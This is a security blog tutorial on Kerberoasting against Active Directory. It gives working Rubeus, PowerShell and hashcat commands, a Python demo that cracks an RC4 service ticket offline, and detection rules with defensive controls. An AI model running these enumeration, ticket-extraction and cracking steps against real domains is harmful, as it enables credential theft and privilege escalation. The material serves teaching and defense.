
Kerberoasting: Active Directory Attack Technique

👤 Helix Kitten Research 📅 March 15, 2026 ⏱ 12 min read
Active Directory Kerberos Credential Access T1558.003

Overview

Kerberoasting is a post-exploitation attack technique that targets Service Principal Names (SPNs) in Active Directory environments. By requesting Kerberos service tickets (TGS) for accounts with registered SPNs, an attacker obtains ciphertext encrypted under the service account's password-derived key and can attempt offline password cracking. Because no password guesses are ever sent to the domain controller, the attack never triggers account lockout policies.

This technique is mapped to MITRE ATT&CK T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting) and remains one of the most effective methods for privilege escalation within enterprise Active Directory environments.

ℹ️
Kerberoasting requires only a valid domain user account — no elevated privileges are needed to request service tickets, making it a low-barrier, high-impact attack.

How Kerberoasting Works

A Kerberos service ticket is encrypted with the long-term key of the service account that owns the SPN, and that key is derived directly from the account's password: for RC4-HMAC (etype 23) it is simply the NT hash (MD4 of the UTF-16LE password, no salt, no stretching), and for AES (etypes 17/18) it is a PBKDF2-derived key. Any authenticated domain user may request a ticket for any SPN, so the attack is:

  1. Authenticate to the domain with any valid user credentials
  2. Query Active Directory over LDAP for accounts whose servicePrincipalName attribute is populated
  3. Request TGS tickets for the discovered SPNs from the Key Distribution Center (KDC)
  4. Extract the encrypted part of each ticket (ciphertext plus its integrity checksum) into a crackable hash format; the ticket does not contain the hash itself, it is encrypted under a key derived from it
  5. Crack offline with Hashcat or John the Ripper: each guessed password is turned into the candidate key, the ticket is decrypted with it, and the checksum is verified, so a correct guess is recognised without any further contact with the domain

Because the TGS request is a normal Kerberos operation it blends in rather than going unlogged: domain controllers record it as Event ID 4769 under the default "Kerberos Service Ticket Operations" success auditing, but the same event is generated for every legitimate service access, so a handful of roasting requests are hard to pick out without the filtering described under Detection & Defense.

Prerequisites

  • Valid domain user credentials (any authenticated user)
  • Network access to a Domain Controller (TCP/UDP port 88 for Kerberos; LDAP on 389/636 for SPN enumeration)
  • Target accounts must have SPNs registered (service accounts, SQL servers, IIS app pools)
  • Weak or guessable passwords on service accounts (for successful cracking)

Step-by-Step Attack

Enumerate SPNs with PowerShell

Use native Active Directory PowerShell modules to discover accounts with SPNs:

powershell
# Enumerate all user accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
  Select-Object Name, SamAccountName, ServicePrincipalName

# Alternative: setspn.exe (built-in Windows tool)
setspn -T corp.local -Q */*

Extract Tickets with Rubeus

Rubeus is a C# toolset for Kerberos interaction and abuse. It can request and extract service tickets in a crackable format:

cmd
# Request tickets for all kerberoastable accounts
Rubeus.exe kerberoast /outfile:hashes.txt

# Target a specific SPN
Rubeus.exe kerberoast /spn:MSSQLSvc/db01.corp.local:1433

# Request RC4 (etype 23) tickets even for AES-capable accounts: the TGS-REQ is built by
# Rubeus with the tgtdeleg trick and asks for RC4, which is easier to crack but is exactly
# the downgrade that 4769-based detections alert on (/rc4opsec avoids it by roasting only
# accounts that do not support AES)
Rubeus.exe kerberoast /tgtdeleg

Crack with Hashcat

bash
# Crack Kerberos 5 TGS-REP (RC4 - type 23)
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# Crack AES tickets: etype 17 (AES128) is -m 19600, etype 18 (AES256) is -m 19700.
# PBKDF2 key derivation makes each guess far more expensive than RC4
hashcat -m 19700 hashes.txt wordlist.txt

# Check results
hashcat -m 13100 hashes.txt --show
$krb5tgs$23$*svc_sql$CORP.LOCAL*$...:Summer2024!

⚠️
Legal Notice: Only perform Kerberoasting attacks against systems you are authorized to test. Unauthorized access to computer systems is a criminal offense under laws such as the CFAA (US) and Computer Misuse Act (UK).
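Why the offline step works, as an added example that is not part of the original article or of any tool it names: it implements the RFC 4757 RC4-HMAC (etype 23) encryption that protects a service ticket, packs the result into the $krb5tgs$23$ line format that hashcat -m 13100 reads, and then cracks it the way hashcat does, turning each wordlist guess into an NT hash, rebuilding the per-message keys, decrypting and verifying the HMAC-MD5 checksum. The account name, realm, SPN, ticket body, password and wordlist are constructed for the demonstration; the ticket body stands in for the ASN.1 EncTicketPart a real KDC would return.

```python
"""Added example (not from the article): RC4-HMAC ticket encryption and offline cracking.
Builds a $krb5tgs$23$ hash from a constructed service account password, then recovers the
password from a wordlist the way a cracker does. No Kerberos traffic is involved.
"""
import hmac
import os
import struct
from hashlib import md5

MASK = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the ticket enc-part of a TGS-REP


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds of hashlib often lack it."""
    f1 = lambda x, y, z: (x & y) | (~x & z)
    f2 = lambda x, y, z: (x & y) | (x & z) | (y & z)
    f3 = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (
        (f1, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (f2, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (f3, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for f, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a, b, c, d = v  # role rotation: the next step sees (d, new_a, b, c)
                v = [d, rotl((a + f(b, c, d) + x[k] + const) & MASK, shifts[i % 4]), b, c]
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (KSA + PRGA)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: MD4(UTF-16LE(password)), unsalted."""
    return md4(password.encode("utf-16-le"))


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = KEY_USAGE_TICKET) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf||pt); K3 = HMAC(K1, checksum)."""
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    data = os.urandom(8) + plaintext  # 8-byte random confounder, as the KDC prepends
    checksum = hmac.new(k1, data, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum + rc4(k3, data)


def to_hashcat(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """hashcat -m 13100 line: $krb5tgs$23$*user$REALM$spn*$checksum$edata2 (hex)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack(hash_line: str, wordlist, usage: int = KEY_USAGE_TICKET):
    """Test guesses offline: only the right key makes the decrypted data match the checksum."""
    checksum_hex, edata_hex = hash_line.rsplit("*$", 1)[1].split("$")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for guess in wordlist:
        k1 = hmac.new(nt_hash(guess), struct.pack("<I", usage), md5).digest()
        k3 = hmac.new(k1, checksum, md5).digest()
        if hmac.compare_digest(hmac.new(k1, rc4(k3, edata), md5).digest(), checksum):
            return guess
    return None


# Constructed scenario (assumptions, not a real ticket): the body stands in for the
# ASN.1 EncTicketPart a KDC would return for MSSQLSvc/db01.corp.local:1433.
SERVICE_PASSWORD = "Summer2024!"
TICKET_BODY = b"EncTicketPart{cname=jdoe, crealm=CORP.LOCAL, key=..., authtime=...}"
WORDLIST = ["Password1", "Welcome1", "Summer2024!", "Winter2025!"]


def demo():
    """Roast the constructed account: returns the recovered password or None."""
    enc_part = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), TICKET_BODY)
    line = to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433", enc_part)
    return crack(line, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

The cost per guess here is one MD4 and three HMAC-MD5 calls plus an RC4 pass, which is why RC4 tickets fall so quickly on a GPU; the AES etypes insert a 4,096-iteration PBKDF2 in front of that, which is the whole benefit of the "AES only" control below, and nothing more.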

Detection & Defense

Defending against Kerberoasting requires a multi-layered approach combining preventive controls and detection mechanisms:

Preventive Controls

  • Strong service account passwords: Use 25+ character randomly generated passwords for every account with an SPN; the ticket can always be requested, so password strength is what makes cracking impractical
  • Group Managed Service Accounts (gMSA): Active Directory generates a long random (240-byte) password and rotates it automatically every 30 days by default, so there is nothing guessable to crack
  • AES encryption only: Set msDS-SupportedEncryptionTypes on service accounts to AES128/AES256 (and disable RC4_HMAC_MD5 by GPO where the environment tolerates it) so tickets are issued with etype 17/18; the PBKDF2 key derivation makes each guess far more expensive than RC4, but weak passwords still fall, so this complements rather than replaces strong passwords
  • Minimize SPNs: Audit and remove unnecessary SPNs from user accounts; use computer accounts where possible, since their passwords are long, random and rotated
  • Privileged Access Management: Avoid assigning Domain Admin or high-privilege group memberships to service accounts, so a cracked password does not hand over the domain

Detection Methods

  • Windows Event ID 4769: Monitor for TGS requests with RC4 encryption (Ticket Encryption Type 0x17), especially for accounts that support AES, since that indicates a downgrade; in an AES-only environment key on volume and distinct services per requester instead of etype
  • Anomaly detection: Alert on users requesting TGS tickets for an abnormal number of services
  • Honey SPNs: Create decoy service accounts with SPNs as tripwires — any TGS request triggers an alert
  • Sigma rules: Deploy community detection rules for Kerberoasting activity patterns

KQL (Microsoft Sentinel)
// Detect potential Kerberoasting via RC4 TGS requests
SecurityEvent
| where EventID == 4769
| where Status == "0x0"                   // Only tickets actually issued
| where TicketEncryptionType == "0x17"   // RC4
| where ServiceName !endswith "$"         // Exclude machine accounts
| where ServiceName != "krbtgt"           // Exclude TGT renewals and referrals
| summarize Count=count(), Services=dcount(ServiceName) by TargetUserName, IpAddress, bin(TimeGenerated, 5m)
| where Count > 5
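The RC4 volume rule and the honey-SPN tripwire above, as an added example (not from the original article) run over constructed 4769 events rather than real logs. It mirrors the KQL filters, skipping machine accounts, krbtgt and failed requests and binning by 5-minute windows, but counts distinct services per requester, which is closer to the "abnormal number of services" signal than a raw event count. The decoy account name svc_honey_fileshare, the usernames, addresses and timestamps are all assumptions.

```python
"""Added example (not from the article): Kerberoasting detections over constructed 4769 events."""
from collections import defaultdict
from datetime import datetime

RC4 = "0x17"
HONEY_ACCOUNTS = {"svc_honey_fileshare"}  # assumption: decoy account with an SPN nobody should use

# Constructed sample events (not real logs). Fields follow Event ID 4769:
# TargetUserName (requester), IpAddress, ServiceName (account owning the SPN),
# TicketEncryptionType, Status (0x0 = ticket issued).
FIELDS = ("time", "user", "ip", "service", "etype", "status")
RAW = [
    ("2026-03-15T09:00:05", "jdoe", "10.0.0.25", "svc_sql", "0x17", "0x0"),
    ("2026-03-15T09:00:06", "jdoe", "10.0.0.25", "svc_iis", "0x17", "0x0"),
    ("2026-03-15T09:00:06", "jdoe", "10.0.0.25", "svc_backup", "0x17", "0x0"),
    ("2026-03-15T09:00:07", "jdoe", "10.0.0.25", "svc_sharepoint", "0x17", "0x0"),
    ("2026-03-15T09:00:07", "jdoe", "10.0.0.25", "svc_exchange", "0x17", "0x0"),
    ("2026-03-15T09:00:08", "jdoe", "10.0.0.25", "svc_sccm", "0x17", "0x0"),
    ("2026-03-15T09:00:08", "jdoe", "10.0.0.25", "WS01$", "0x17", "0x0"),        # machine account: skip
    ("2026-03-15T09:00:09", "jdoe", "10.0.0.25", "krbtgt", "0x12", "0x0"),       # TGT traffic: skip
    ("2026-03-15T09:00:09", "jdoe", "10.0.0.25", "svc_adsync", "0x17", "0x1F"),  # request failed: skip
    ("2026-03-15T09:07:30", "jdoe", "10.0.0.25", "svc_sql", "0x17", "0x0"),      # next 5-minute window
    ("2026-03-15T09:01:00", "asmith", "10.0.0.40", "svc_sql", "0x12", "0x0"),    # AES: ordinary use
    ("2026-03-15T09:01:02", "asmith", "10.0.0.40", "svc_iis", "0x17", "0x0"),
    ("2026-03-15T09:10:00", "bwong", "10.0.0.77", "svc_honey_fileshare", "0x12", "0x0"),
]
EVENTS = [dict(zip(FIELDS, row)) for row in RAW]


def window(ts: str, minutes: int = 5) -> datetime:
    """Floor a timestamp to its 5-minute bin, like KQL's bin(TimeGenerated, 5m)."""
    t = datetime.fromisoformat(ts)
    return t.replace(minute=t.minute - t.minute % minutes, second=0, microsecond=0)


def is_roast_candidate(ev: dict) -> bool:
    """Same filters as the KQL: issued RC4 tickets for a service that is not a machine account or krbtgt."""
    return (ev["status"] == "0x0" and ev["etype"] == RC4
            and not ev["service"].endswith("$") and ev["service"].lower() != "krbtgt")


def rc4_bursts(events, threshold: int = 5, minutes: int = 5):
    """Requesters that pulled RC4 tickets for more than `threshold` distinct services in one window."""
    services = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            services[(ev["user"], ev["ip"], window(ev["time"], minutes))].add(ev["service"])
    return sorted((user, ip, w.isoformat(), len(svcs))
                  for (user, ip, w), svcs in services.items() if len(svcs) > threshold)


def honey_hits(events):
    """Any ticket request for a decoy account is an alert, whatever the encryption type."""
    return [(ev["user"], ev["ip"], ev["service"], ev["etype"])
            for ev in events if ev["service"] in HONEY_ACCOUNTS]


if __name__ == "__main__":
    for hit in rc4_bursts(EVENTS):
        print("RC4 burst:", hit)
    for hit in honey_hits(EVENTS):
        print("Honey SPN touched:", hit)
```

Note that the honey rule deliberately ignores the encryption type: a decoy account should be requested by nobody, so one AES ticket for it is as suspicious as an RC4 one, and it still fires when the attacker uses /rc4opsec-style opsec to avoid the downgrade.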

Tools Used

  • Rubeus — C# Kerberos abuse toolkit (GhostPack)
  • Impacket (GetUserSPNs.py) — Python-based Kerberoasting from Linux
  • PowerView (Get-DomainUser -SPN, Get-DomainSPNTicket, Invoke-Kerberoast) — PowerShell SPN enumeration and ticket requests
  • Hashcat — GPU-accelerated password cracking
  • John the Ripper — CPU-based hash cracking with krb5tgs module
  • BloodHound — AD attack path visualization and Kerberoastable user identification

References

  • MITRE ATT&CK T1558.003 — Steal or Forge Kerberos Tickets: Kerberoasting
  • Tim Medin — "Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades" (DerbyCon 2014)
  • Sean Metcalf — ADSecurity.org Kerberoasting guide
  • SpecterOps — "Roasting AS-REPs" and "Targeted Kerberoasting"
  • Microsoft — "Detecting Kerberoasting Activity" security guidance